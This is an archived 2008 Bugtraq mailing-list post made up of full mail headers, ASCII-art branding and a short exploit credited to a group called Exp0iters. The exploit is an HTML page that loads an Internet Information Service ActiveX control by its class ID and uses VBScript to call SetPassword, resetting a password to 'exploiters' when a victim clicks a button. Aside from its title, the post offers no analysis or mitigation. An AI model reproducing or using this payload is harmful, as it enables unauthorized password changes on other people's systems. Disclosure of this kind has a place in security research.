[From nobody Thu Oct 2 11:59:23 2008 Return-Path: <cyrus@fezzik> Received: from fezzik ([unix socket]) (authenticated user=mailinglists bits=0) by fezzik (Cyrus v2.1.18-IPv6-Debian-2.1.18-1) with LMTP; Wed, 24 Sep 2008 20:29:07 +0300 X-Sieve: CMU Sieve 2.2 Return-Path: <bugtraq-return-38185-bugtraq42115=beyondsecurity.com@securityfocus.com> X-Spam-Checker-Version: SpamAssassin 3.1.7-deb (2006-10-05) on fezzik X-Spam-Level: ** X-Spam-Status: No, score=2.7 required=6.0 tests=BAYES_20,NO_REAL_NAME, SPF_FAIL,WEIRD_QUOTING autolearn=no version=3.1.7-deb Received: from houseofcards.securiteam.com (securiteam.com [192.117.232.213]) by fezzik.beyondsecurity.com (Postfix) with SMTP id 78B6C208046 for <bugtraq@mail.beyondsecurity.com>; Wed, 24 Sep 2008 20:29:03 +0300 (IDT) Received: (qmail 2466 invoked by uid 501); 24 Sep 2008 17:29:50 -0000 Delivered-To: aviram-beyondsecurity-bugtraq42115@beyondsecurity.com Received: (qmail 2459 invoked from network); 24 Sep 2008 17:29:50 -0000 Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27) by 0 with SMTP; 24 Sep 2008 17:29:50 -0000 Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) by outgoing3.securityfocus.com (Postfix) with QMQP id 4A11223704E; Wed, 24 Sep 2008 09:51:40 -0600 (MDT) Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq@securityfocus.com> List-Help: <mailto:bugtraq-help@securityfocus.com> List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com> List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com> Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 7414 invoked from network); 24 Sep 2008 12:37:55 -0000 Date: 24 Sep 2008 12:40:07 -0000 Message-ID: <20080924124007.14348.qmail@securityfocus.com> Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) From: hamedata@gmail.com To: bugtraq@securityfocus.com Subject: Internet Information Service remote set password X-UID: 22553 X-Length: 3929 """"""""""""""""""""""""""""""""""""""""""""""""""""""""""" """ :::::: :: :: :: :: :: :::: """ """ :: :: :: :: :::::: .. :::: :: """ """ ::::: ::: ::::: :: :: :: :: :: :::: """ """ :: :: :: :: : :: :: :: :: :: :: """ """ :::::: :: :: ::::: :: :::::: :: :: :::: rs.ir """ """ :: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""""""""""""""" # Tilte: Internet Information Service set password # Exp0iters member (order by alphabet) .........: [Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r] # Author........................................: [hamedata] # E-mail........................................: [hamedata@gmail.com] # Location .....................................: [Iran] # Software .....................................: [Internet Information Service] # Sp Tanx2 .....................................: [ALL HACKERS] # Vulnerability: Remote set password # Part Expl0it & Bug Codes : =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- <html> <object classid='clsid:C3B32488-AFEC-11D1-9868-00A0C922E703' id='iis' /></object> <input language=VBScript onclick=try() type=button value='start'> <script language='vbscript'> Sub try iis.SetPassword "exploiters" End Sub </script> </html> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Part Contact : Contact me : hamedata@gmail.com Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM ]